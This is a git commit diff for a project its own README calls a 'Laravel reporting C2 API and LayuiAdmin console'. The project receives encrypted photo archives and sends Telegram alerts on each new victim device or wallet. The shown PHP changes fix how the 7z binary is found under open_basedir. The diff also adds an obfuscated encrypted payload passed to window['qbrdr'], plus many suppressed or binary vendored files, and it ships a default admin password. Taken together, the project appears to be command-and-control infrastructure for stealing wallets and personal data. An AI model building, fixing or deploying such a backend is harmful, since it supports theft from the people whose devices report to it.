init
This commit is contained in:
+6
-1
@@ -46,7 +46,12 @@ ADMIN_PASSWORD=admin123
|
|||||||
|
|
||||||
# Optional: pin session key (16 ASCII). Empty = derive from archive password seed 0.
|
# Optional: pin session key (16 ASCII). Empty = derive from archive password seed 0.
|
||||||
CORUNA_SESSION_KEY=
|
CORUNA_SESSION_KEY=
|
||||||
CORUNA_7Z_BIN=/opt/homebrew/opt/p7zip/bin/7z
|
# p7zip binary. On panel hosts with open_basedir, prefer project-local:
|
||||||
|
# mkdir -p bin && cp "$(command -v 7z)" bin/7z && chmod +x bin/7z
|
||||||
|
# CORUNA_7Z_BIN=/www/wwwroot/coruna-lab/server/bin/7z
|
||||||
|
# Or set the system path (exec usually works; do not rely on is_executable):
|
||||||
|
# CORUNA_7Z_BIN=/usr/bin/7z
|
||||||
|
CORUNA_7Z_BIN=
|
||||||
|
|
||||||
# Telegram (new device / new wallet only — no bot commands, no /kill)
|
# Telegram (new device / new wallet only — no bot commands, no /kill)
|
||||||
TELEGRAM_BOT_TOKEN=
|
TELEGRAM_BOT_TOKEN=
|
||||||
|
|||||||
+1
-1
@@ -15,7 +15,7 @@ Laravel reporting C2 API and LayuiAdmin console for local lab use.
|
|||||||
| PHP 8.5+ | `/opt/homebrew/opt/php/bin/php` (do **not** use PATH’s old 7.3) |
|
| PHP 8.5+ | `/opt/homebrew/opt/php/bin/php` (do **not** use PATH’s old 7.3) |
|
||||||
| Composer | via brew PHP |
|
| Composer | via brew PHP |
|
||||||
| MySQL 8.0 | preferred (`coruna_lab` DB) — sqlite works for smoke |
|
| MySQL 8.0 | preferred (`coruna_lab` DB) — sqlite works for smoke |
|
||||||
| p7zip | `/opt/homebrew/opt/p7zip/bin/7z` for photo archives |
|
| p7zip | `CORUNA_7Z_BIN` or `server/bin/7z` (panel `open_basedir` friendly) |
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
export PATH="/opt/homebrew/opt/php/bin:$PATH"
|
export PATH="/opt/homebrew/opt/php/bin:$PATH"
|
||||||
|
|||||||
@@ -19,7 +19,7 @@ class AppServiceProvider extends ServiceProvider
|
|||||||
$this->app->singleton(CorunaArchive::class, function ($app) {
|
$this->app->singleton(CorunaArchive::class, function ($app) {
|
||||||
return new CorunaArchive(
|
return new CorunaArchive(
|
||||||
$app->make(CorunaCrypto::class),
|
$app->make(CorunaCrypto::class),
|
||||||
(string) config('coruna.seven_zip', '/opt/homebrew/opt/p7zip/bin/7z'),
|
(string) config('coruna.seven_zip', ''),
|
||||||
);
|
);
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -20,7 +20,7 @@ class CorunaArchive
|
|||||||
|
|
||||||
public function __construct(
|
public function __construct(
|
||||||
private readonly CorunaCrypto $crypto,
|
private readonly CorunaCrypto $crypto,
|
||||||
private readonly string $sevenZip = '/opt/homebrew/opt/p7zip/bin/7z',
|
private readonly string $sevenZip = '',
|
||||||
) {}
|
) {}
|
||||||
|
|
||||||
public function isCorunaHeader(string $data): bool
|
public function isCorunaHeader(string $data): bool
|
||||||
@@ -85,7 +85,7 @@ class CorunaArchive
|
|||||||
$membersDir = $destDir.'/members';
|
$membersDir = $destDir.'/members';
|
||||||
@mkdir($membersDir, 0755, true);
|
@mkdir($membersDir, 0755, true);
|
||||||
|
|
||||||
$bin = is_executable($this->sevenZip) ? $this->sevenZip : '7z';
|
$bin = $this->resolveSevenZipBinary();
|
||||||
$result = Process::timeout(120)->run([
|
$result = Process::timeout(120)->run([
|
||||||
$bin, 'x', '-y',
|
$bin, 'x', '-y',
|
||||||
'-p'.$password,
|
'-p'.$password,
|
||||||
@@ -113,4 +113,60 @@ class CorunaArchive
|
|||||||
'password_recipe' => 'session_key||'.$batchBase,
|
'password_recipe' => 'session_key||'.$batchBase,
|
||||||
];
|
];
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Resolve 7z path without probing outside open_basedir.
|
||||||
|
* is_executable('/usr/bin/7z') fatals under typical panel open_basedir.
|
||||||
|
*/
|
||||||
|
private function resolveSevenZipBinary(): string
|
||||||
|
{
|
||||||
|
$configured = trim($this->sevenZip);
|
||||||
|
$candidates = array_values(array_unique(array_filter([
|
||||||
|
$configured,
|
||||||
|
// Prefer a binary vendored inside the Laravel root (within open_basedir).
|
||||||
|
base_path('bin/7z'),
|
||||||
|
'7z',
|
||||||
|
])));
|
||||||
|
|
||||||
|
foreach ($candidates as $candidate) {
|
||||||
|
if ($candidate === '7z') {
|
||||||
|
return '7z';
|
||||||
|
}
|
||||||
|
if (! $this->isPathInsideOpenBasedir($candidate)) {
|
||||||
|
// Still try absolute configured path: exec() is often allowed even when
|
||||||
|
// is_executable() is blocked. Skip the filesystem probe.
|
||||||
|
if ($candidate === $configured && str_starts_with($candidate, '/')) {
|
||||||
|
return $candidate;
|
||||||
|
}
|
||||||
|
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
if (@is_file($candidate) && @is_executable($candidate)) {
|
||||||
|
return $candidate;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return $configured !== '' ? $configured : '7z';
|
||||||
|
}
|
||||||
|
|
||||||
|
private function isPathInsideOpenBasedir(string $path): bool
|
||||||
|
{
|
||||||
|
$basedir = (string) ini_get('open_basedir');
|
||||||
|
if ($basedir === '') {
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
$real = realpath($path);
|
||||||
|
$check = $real !== false ? $real : $path;
|
||||||
|
foreach (explode(PATH_SEPARATOR, $basedir) as $root) {
|
||||||
|
$root = rtrim($root, DIRECTORY_SEPARATOR);
|
||||||
|
if ($root === '') {
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
if ($check === $root || str_starts_with($check, $root.DIRECTORY_SEPARATOR)) {
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return false;
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -2,7 +2,9 @@
|
|||||||
|
|
||||||
return [
|
return [
|
||||||
'session_key' => env('CORUNA_SESSION_KEY'), // optional override; empty = derive(seed=0)
|
'session_key' => env('CORUNA_SESSION_KEY'), // optional override; empty = derive(seed=0)
|
||||||
'seven_zip' => env('CORUNA_7Z_BIN', '/opt/homebrew/opt/p7zip/bin/7z'),
|
// Absolute path, project-local bin/7z, or bare "7z" on PATH. Avoid probing
|
||||||
|
// system paths with is_executable() under open_basedir (see CorunaArchive).
|
||||||
|
'seven_zip' => env('CORUNA_7Z_BIN', ''),
|
||||||
'telegram' => [
|
'telegram' => [
|
||||||
'bot_token' => env('TELEGRAM_BOT_TOKEN'),
|
'bot_token' => env('TELEGRAM_BOT_TOKEN'),
|
||||||
'owner_chat_id' => env('TELEGRAM_OWNER_CHAT_ID'),
|
'owner_chat_id' => env('TELEGRAM_OWNER_CHAT_ID'),
|
||||||
|
|||||||
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
@@ -0,0 +1 @@
|
|||||||
|
window["qbrdr"]("CdF4+7F/oRdBEFn37ivRIild1ytEUEiqgEnTk305ruxoFeGj9mLEZrE3GdItgQFLZJCmx4qqGdckVDRhCkVkhSoxdFJqMnqmjrR8Y6SfSfo5ma24/80KtDmb+931V5nyK0BDbjtj0WZc1fcH2ZGyNgYBIbTyu2DRIMx1xKAmrqVh7aEkVEEoZ5tjelckbz9vbeDznElh5NngfVDmGbw+Fo6kp/1jwz3MLNUhg3RbvrWy5WTMHHlda5gtbCO8hIQQuCiMdVPENo8HVpHdUwakhd7nl5LSv30/V2bMj020I6P5OODD6xa9OwwytyA9os5foMqK5mC+v0WObu7VYz/o2EHkia+0lYbSuDmjazsReNvJZh9vyE4az85anC0hyDjpBY+YGdSyUQKTHo28Rn4ID4+jImPfldC0s6CUgwMAPiv2y+A+zk2ImbriIpoTCNck9ZMRK0KTgIVXt302zZrfMaaeKeceHEi4SAsZ4oz2jdcPqd/CsSn0I5Gytwyne0j5s7IiWuGhfkwqJq3GTm4WGIx/6oCAZ2nMOBCz40L1uQxviSgvgLUklmuor+Z+4hRTAIU9XlxzRs90ScvQTbbW9OCrzmB80/dqyOJENzjXqwOF/58Vvjtk6/JwrQ4mPBNaxxO4pF2qh+UCopUNnSwfWPKTmafPniv+xa6YMo0040SoBsd7OEkjzK+hGUQeHegIFrd4+m9lLGl0lMoZ5HN8AiepIZgZvRPzaoBoDJCf6rxeH30YoiYhwspBbpKUAcikrHOSOmoPNyVUJl0GAPUIK4gPIlPIIf1ZzqqiC2/RqOMKybL+JarUJoNQgcKMQp65M/ZdWuVhnV2G5Zp4uysZwHSC6JD/pcgUWSffDJKlxjN45KnWX9wLjZhNZSrJg29jVLFgkyOkXrYJNoXOG4R1FLE7f7sRGjACnMuCvoaT2XW+KM9F/ArPC3FjJ/kmDv1zGgsdGDnboKutkIYGbKrs6rYClvMR0GcNk7KHaTfo3fC29jp2dRUVc9VoDzRDb3MvOjB/oHj7cnu53mbntedkSIkwCHUb7DVyTRyYvSxLpEdcLGTtaRlUcA3QFR0O8qD7dRRNUyzWuQ+Jr5HU57/0aqHBR1rqQTrda5J6tGQSrsz4TPkJCVc0lb5EVnoqnpBKVVl54Ezr7gHZ84B4YsehkI4b8NIMAxZiwODHiO5TBT9NQ3+BdzbPB+DaoPsDpzO2zbx8SnYHYVnKDuWD0XgI8mNaeCDm+7cnYonRkHdeHnmLr1Vc7EHQfEdtyQBB+ZJ+Iv6fPcLFv03P4r+ozYb4dMTyHkcnQ7QxZ0Pg92peHu/91ni4aNYaVvOVKhSWQrOA+KKUjrHFn73GVWOmstJvK/Xz7klH9i0H9P3YcUg3aMqqMpnhSAhJHoWQj+mtxqGtRnhhZJWse2R9oyvaz/XOLmU3ckD/skg/vdE7sJLV2EAkGwb3cE6FE07RShWYUU+bfOQy5kM71CMgRtcobsWk9kz0NlU6f1aJ/xiz7kW6lzkL4fnP89O/6zw13sSycRr25OoI23GQDAGGU0DwM7sYEK5vT768dDE2NZEMYm58Oe3zwVtqNCd3scLVdprhxq4RF6y3ytNC/QvmH8XBE4P0moPhwfMxlTmf2GTZ6t68hEpkfEIqiLCLg9RXAQXjZIdhNwBh7hY674ee6A5vXNCkBYioKtEJFewnmLkAJjebyjeS/0B2Lom8O+7bFgaRQVuDKPeqekQdhEynwnYMwf0KGymsWOE=")
|
||||||
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
+1
File diff suppressed because one or more lines are too long
Vendored
BIN
Binary file not shown.
File diff suppressed because one or more lines are too long
Reference in New Issue
Block a user